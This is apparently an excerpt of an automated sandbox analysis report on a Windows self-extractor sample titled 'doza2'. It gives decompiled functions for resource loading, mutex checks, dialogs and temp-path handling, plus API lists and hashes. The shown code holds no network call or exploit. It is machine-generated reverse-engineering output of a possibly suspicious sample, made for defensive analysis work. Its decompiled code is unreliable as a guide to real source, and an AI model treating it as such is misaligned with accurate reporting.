                                                                                                                                                                                                                                    										CloseHandle( *0x198588);
                                                                                                                                                                                                                                    										 *0x199124 = 0x800700b7;
                                                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                                                    						E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						 *0x199124 = 0x80070714;
                                                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00196CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00192dbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192dca
                                                                                                                                                                                                                                    0x00192dd3
                                                                                                                                                                                                                                    0x00192df5
                                                                                                                                                                                                                                    0x00192e02
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192dd5
                                                                                                                                                                                                                                    0x00192dde
                                                                                                                                                                                                                                    0x00192de3
                                                                                                                                                                                                                                    0x00192e04
                                                                                                                                                                                                                                    0x00192e0a
                                                                                                                                                                                                                                    0x00192e10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192e10
                                                                                                                                                                                                                                    0x00192dd3
                                                                                                                                                                                                                                    0x00192dbb
                                                                                                                                                                                                                                    0x00192da1
                                                                                                                                                                                                                                    0x00192d5b
                                                                                                                                                                                                                                    0x00192d5b
                                                                                                                                                                                                                                    0x00192d5d
                                                                                                                                                                                                                                    0x00192d69
                                                                                                                                                                                                                                    0x00192d6e
                                                                                                                                                                                                                                    0x00192f06
                                                                                                                                                                                                                                    0x00192f06
                                                                                                                                                                                                                                    0x00192f06
                                                                                                                                                                                                                                    0x00192d59
                                                                                                                                                                                                                                    0x00192f18

APIs
• memset.MSVCRT ref: 00192CD9
• memset.MSVCRT ref: 00192CE9
• memset.MSVCRT ref: 00192CF9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
  • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
  • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00192D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00192D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00192DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00192DBD
• CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00192E0A
  • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
  • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
• API String ID: 1002816675-859929227
• Opcode ID: 688e5e5f881a1c526ff0cb572b7ee54ab47fbbd4f85a20b98fcee1dc4972acd9
• Instruction ID: 5c59c6445728df3b7b9b6c77d87410fa6f744c13bfd0e360f8d4c6f30e9c635e
• Opcode Fuzzy Hash: 688e5e5f881a1c526ff0cb572b7ee54ab47fbbd4f85a20b98fcee1dc4972acd9
• Instruction Fuzzy Hash: 10511670340301BBEF24AB389D8AF7B3698EB55710F14403AF941D69E1EBB89CC1C666
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%
E001934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
	void* _t9;
	void* _t12;
	void* _t13;
	void* _t17;
	void* _t23;
	void* _t25;
	struct HWND__* _t35;
	struct HWND__* _t38;
	void* _t39;

	_t9 = _a8 - 0x10;
	if(_t9 == 0) {
		__eflags = 1;
		L19:
		_push(0);
		 *0x1991d8 = 1;
		L20:
		_push(_a4);
		L21:
		EndDialog();
		L22:
		return 1;
	}
	_push(1);
	_pop(1);
	_t12 = _t9 - 0xf2;
	if(_t12 == 0) {
		__eflags = _a12 - 0x1b;
		if(_a12 != 0x1b) {
			goto L22;
		}
		goto L19;
	}
	_t13 = _t12 - 0xe;
	if(_t13 == 0) {
		_t35 = _a4;
		 *0x198584 = _t35;
		E001943D0(_t35, GetDesktopWindow());
		__eflags =  *0x198184; // 0x1
		if(__eflags != 0) {
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
			SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
		}
		SetWindowTextA(_t35, "doza2");
		_t17 = CreateThread(0, 0, E00194FE0, 0, 0, 0x198798);
		 *0x19879c = _t17;
		__eflags = _t17;
		if(_t17 != 0) {
			goto L22;
		} else {
			E001944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					ResetEvent( *0x19858c);
                                                                                                                                                                                                                                    					_t38 =  *0x198584; // 0x0
                                                                                                                                                                                                                                    					_t25 = E001944B9(_t38, 0x4b2, 0x191140, 0, 0x20, 4);
                                                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						 *0x1991d8 = 1;
                                                                                                                                                                                                                                    						SetEvent( *0x19858c);
                                                                                                                                                                                                                                    						_t39 =  *0x19879c; // 0x0
                                                                                                                                                                                                                                    						E00193680(_t39);
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					SetEvent( *0x19858c);
                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                    					TerminateThread( *0x19879c, 0);
                                                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                    			}












Statement addresses (the decompiler's per-line address column, in the same order as the decompiled lines above; 0x00000000 where the decompiler assigned none):
0x001934fb 0x001934fe 0x00193665 0x00193666 0x00193666 0x00193668 0x0019366e 0x0019366e 0x00193671 0x00193671 0x00193677 0x00000000 0x00193677
0x00193504 0x00193506 0x00193507 0x0019350c 0x0019365b 0x0019365f 0x00000000 0x00000000 0x00000000 0x00193661
0x00193512 0x00193515 0x001935be 0x001935c1 0x001935d1 0x001935d8 0x001935de 0x001935f8 0x00193617 0x00193617 0x00193623 0x00193637 0x0019363d 0x00193642 0x00193644 0x00000000 0x00193646 0x00193652 0x00193657 0x00193658 0x00000000 0x00193658 0x00193644
0x0019351b 0x0019351d 0x0019354f 0x00193553 0x00000000 0x00000000 0x0019355f 0x00193565 0x0019357c 0x00193581 0x00193584 0x0019359b 0x001935a1 0x001935a7 0x001935ad 0x001935b3 0x001935b8 0x00000000 0x001935b8 0x00193586 0x00193588 0x00000000 0x00000000 0x00193590 0x00000000 0x00193590
0x00193524 0x00193535 0x00193541 0x00000000 0x00193549 0x00000000

APIs
• TerminateThread.KERNEL32(00000000), ref: 00193535
• EndDialog.USER32(?,?), ref: 00193541
• ResetEvent.KERNEL32 ref: 0019355F
• SetEvent.KERNEL32(00191140,00000000,00000020,00000004), ref: 00193590
• GetDesktopWindow.USER32 ref: 001935C7
• GetDlgItem.USER32(?,0000083B), ref: 001935F1
• SendMessageA.USER32(00000000), ref: 001935F8
• GetDlgItem.USER32(?,0000083B), ref: 00193610
• SendMessageA.USER32(00000000), ref: 00193617
• SetWindowTextA.USER32(?,doza2), ref: 00193623
• CreateThread.KERNEL32 ref: 00193637
• EndDialog.USER32(?,00000000), ref: 00193671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
                                                                                                                                                                                                                                    • Opcode ID: 89ce496cc69eb1c1cd2bfb76ea3e3b6be8f29c2e10c27c99063fb4b020cf96ad
                                                                                                                                                                                                                                    • Instruction ID: 98c7c1614ea2c074c481f7981f08ada039016d559c5cde98e4aad797448495a2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ce496cc69eb1c1cd2bfb76ea3e3b6be8f29c2e10c27c99063fb4b020cf96ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E310870240301BBEF201F34EC0DE2B3A69FB8AB00F51452BF622956F0CB718A84CB95
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E00194224(char __ecx) {
                                                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E001944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t76 =  *0x1988c0; // 0x0
                                                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                                    					 *0x1987a0 = 0;
                                                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                                                    					_v40 = 0x198598;
                                                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                                                    					_v32 = E00194200;
                                                                                                                                                                                                                                    					_v28 = 0x1988c0;
                                                                                                                                                                                                                                    					 *0x19a288( &_v52);
                                                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                                                    						 *0x19a288(_t32, 0x1988c0);
                                                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if( *0x1988c0 != 0) {
                                                                                                                                                                                                                                    							E00191680(0x1987a0, 0x104, 0x1988c0);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x19a288(_v12);
                                                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                                                    					_t85 =  *0x1987a0; // 0x0
                                                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					GetTempPathA(0x104, 0x1988c0);
                                                                                                                                                                                                                                    					_t61 = 0x1988c0;
					_t4 =  &(_t61[1]); // 0x1988c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x1988c0; // 0x331181
					_t44 = CharPrevA(0x1988c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x1988c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

APIs
• LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00194236
• GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0019424C
• GetProcAddress.KERNEL32(00000000,000000C3), ref: 00194263
• GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0019427A
• GetTempPathA.KERNEL32(00000104,001988C0,?,00000001), ref: 0019429F
• CharPrevA.USER32(001988C0,00331181,?,00000001), ref: 001942C2
• CharPrevA.USER32(001988C0,00000000,?,00000001), ref: 001942D6
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00194391
• FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001943A5
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
• String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
• API String ID: 1865808269-1731843650
• Opcode ID: a4f639f58a595c43beb2dcd8d3a3120c83377f116dd2b1eace2259d73514a55e
• Instruction ID: 84874c625658b7d33882ff167327d6c802c7778cd8fa3fc1b35b14fd69d2eaa5
• Opcode Fuzzy Hash: a4f639f58a595c43beb2dcd8d3a3120c83377f116dd2b1eace2259d73514a55e
• Instruction Fuzzy Hash: C941D174E00214AFDF11AFB4EC98E6EBBB4FF46344F54016AE941A3251CB748D86C7A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
			E001944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
                                                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                                                    				_t34 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                                                    				if(( *0x198a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                                                    					LoadStringA( *0x199a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                                                    									E00191680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E0019171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                                                    								E0019171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                                                    								if(E0019681F(_t67) == 0) {
                                                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t54 = E001967C9(_t74, _t74);
                                                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(E0019681F(_t67) == 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t66 = E001967C9(0, 0);
                                                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00196CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                    			}
Instruction addresses (the address column of the decompiled listing above, separated from its code lines by extraction):
0x001944b9 0x001944c4 0x001944cb 0x001944d8 0x001944e4 0x001944eb 0x001944ee 0x001944ef
0x001944ef 0x001944f1 0x001944f7 0x001944f8 0x0019467b 0x001944fe 0x00194509 0x00194518
0x00194525 0x00194562 0x00194568 0x00194568 0x0019456b 0x0019456b 0x0019456d 0x0019456e
0x00194572 0x00194578 0x0019457c 0x001945cb 0x00194607 0x00194607 0x0019460d 0x00194613
0x00194617 0x00000000 0x0019461d 0x00194623 0x00194626 0x00194628 0x00000000 0x00194628
0x001945cd 0x001945cd 0x001945cf 0x001945cf 0x001945d2 0x001945d2 0x001945d4 0x001945d5
0x001945db 0x001945de 0x001945e3 0x001945e9 0x001945ed 0x00000000 0x001945f3 0x001945fd
0x00000000 0x00194602 0x001945ed 0x0019457e 0x0019457e 0x00194580 0x00194580 0x00194583
0x00194583 0x00194585 0x00194586 0x0019458a 0x0019458c 0x0019458f 0x0019458f 0x00194591
0x00194592 0x0019459b 0x0019459e 0x001945a3 0x001945a9 0x001945ad 0x00000000 0x001945af
0x001945af 0x001945bf 0x0019462d 0x00194630 0x0019463d 0x0019464e 0x0019464e 0x0019463f
0x00194640 0x00194647 0x0019464c 0x00000000 0x00000000 0x0019464c 0x00194666 0x0019466d
0x0019466f 0x00194675 0x00194675 0x001945ad 0x00194527 0x0019452e 0x0019453f 0x0019453f
0x00194530 0x00194531 0x00194538 0x0019453d 0x00000000 0x00000000 0x0019453d 0x00194554
0x0019455a 0x0019455a 0x0019455a 0x00194525 0x0019468c

APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
• MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 001945A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 001945E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0019460D
• MessageBeep.USER32(00000000), ref: 00194630
• MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00194666
• LocalFree.KERNEL32(00000000), ref: 0019466F
  • Part of subcall function 0019681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0019686E
  • Part of subcall function 0019681F: GetSystemMetrics.USER32(0000004A), ref: 001968A7
